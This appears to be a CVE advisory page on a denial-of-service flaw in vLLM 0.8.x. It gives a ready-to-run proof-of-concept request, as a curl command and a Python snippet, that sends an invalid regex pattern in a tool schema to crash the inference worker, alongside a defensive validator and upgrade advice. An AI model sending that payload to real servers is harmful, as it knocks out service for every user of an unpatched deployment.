vLLM, Input Validation Vulnerability, CVE-2025-48944 (Critical)


How the CVE Works

The vulnerability affects vLLM from 0.8.0 up to, but not including, 0.9.0 and stems from improper input validation in the OpenAI-compatible `/v1/chat/completions` endpoint. When the "tools" functionality is used, the backend fails to sanitize malformed values in the "pattern" and "type" fields of a tool's JSON schema. These unchecked inputs are compiled or parsed directly, and a malformed value crashes the inference worker. The worker remains non-functional until it is manually restarted, disrupting LLM inference for every client of that server. The flaw is fixed in vLLM 0.9.0, which validates these fields before using them.
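
To make the failure mode concrete, here is a minimal sketch of an unguarded compile step and its guarded counterpart. The function names are hypothetical, and Python's `re` module stands in for whatever regex or grammar engine the backend actually invokes; this illustrates the bug class, not vLLM's code.

import re

def compile_tool_pattern(pattern):
    # Hypothetical stand-in for the vulnerable path: the "pattern" field
    # from a tool's JSON schema is compiled as-is. An invalid value such as
    # "[" raises re.error, and an exception that nothing catches is what
    # leaves the inference worker dead until a manual restart.
    return re.compile(pattern)

def compile_tool_pattern_guarded(pattern):
    # The patched behavior in spirit: validate first and turn a bad value
    # into a client error (HTTP 400) instead of letting the exception escape.
    try:
        return re.compile(pattern)
    except re.error as exc:
        raise ValueError(f"rejecting malformed 'pattern': {exc}") from exc

# compile_tool_pattern("[")  -> re.error: unterminated character set at position 0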

DailyCVE Form

Platform: vLLM
Version: 0.8.0-0.8.x
Vulnerability: Input Validation
Severity: Critical
Date: 05/30/2025

Prediction: Patched in vLLM 0.9.0

What Undercode Says

# Illustrative PoC (placeholder host and model): "tools" carries a JSON schema whose "pattern" is an invalid regex
curl -X POST http://vllm-server/v1/chat/completions -H 'Content-Type: application/json' -d '{"model": "any-model", "messages": [{"role": "user", "content": "hi"}], "tools": [{"type": "function", "function": {"name": "f", "parameters": {"type": "object", "properties": {"x": {"type": "string", "pattern": "["}}}}}]}'

import requests  # same request in Python; the malformed pattern "[" never compiles
tool = {"type": "function", "function": {"name": "f", "parameters": {"type": "object",
        "properties": {"x": {"type": "string", "pattern": "["}}}}}
payload = {"model": "any-model", "messages": [{"role": "user", "content": "hi"}], "tools": [tool]}
requests.post("http://vllm-server/v1/chat/completions", json=payload)
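
Against an unpatched worker, either request crashes the process, and the service stays down until someone restarts it; a defensive pre-check is sketched under Protection below.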

How the Exploit Works

  • Send crafted “pattern” or “type” fields via API.
  • Worker crashes, denying service.
  • No authentication required.

Protection from this CVE

  • Upgrade to vLLM 0.9.0+.
  • Implement input sanitization in front of unpatched servers (see the sketch after this list).
  • Monitor worker health.
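
For deployments that cannot upgrade immediately, a reverse proxy or middleware can reject malformed tool schemas before they reach vLLM. The sketch below is one way to do that; the recursive walk and the allowed-type set are assumptions about the JSON-schema fragments that tool definitions carry, not code from the vLLM patch.

import re

# Primitive JSON Schema type names; full JSON Schema also allows a list of
# types, which this simplified check would reject.
ALLOWED_TYPES = {"object", "array", "string", "number", "integer", "boolean", "null"}

def validate_schema_fragment(node) -> None:
    # Recursively walk a schema fragment and fail fast on the two fields
    # this CVE abuses, instead of letting the worker crash on them.
    if isinstance(node, dict):
        t = node.get("type")
        if t is not None and (not isinstance(t, str) or t not in ALLOWED_TYPES):
            raise ValueError(f"unexpected 'type' value: {t!r}")
        if "pattern" in node:
            try:
                re.compile(node["pattern"])
            except (re.error, TypeError) as exc:
                raise ValueError(f"malformed 'pattern' value: {exc}")
        for child in node.values():
            validate_schema_fragment(child)
    elif isinstance(node, list):
        for item in node:
            validate_schema_fragment(item)

def validate_tools(tools) -> None:
    # Only the "parameters" block of each tool is a JSON-schema fragment;
    # the outer {"type": "function", ...} wrapper uses "type" differently.
    for tool in tools:
        validate_schema_fragment(tool.get("function", {}).get("parameters", {}))

Calling `validate_tools(body["tools"])` before forwarding a request, and returning HTTP 400 on `ValueError`, keeps such payloads away from the worker; it is a stopgap, not a substitute for upgrading to 0.9.0.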

Impact

  • Service disruption.
  • Manual recovery needed.
  • LLM downtime.

Sources:

Reported By: nvd.nist.gov

πŸ”JOIN OUR CYBER WORLD [ CVE News β€’ HackMonitor β€’ UndercodeNews ]

πŸ’¬ Whatsapp | πŸ’¬ Telegram

πŸ“’ Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | πŸ”— Linkedin Featured Image

Scroll to Top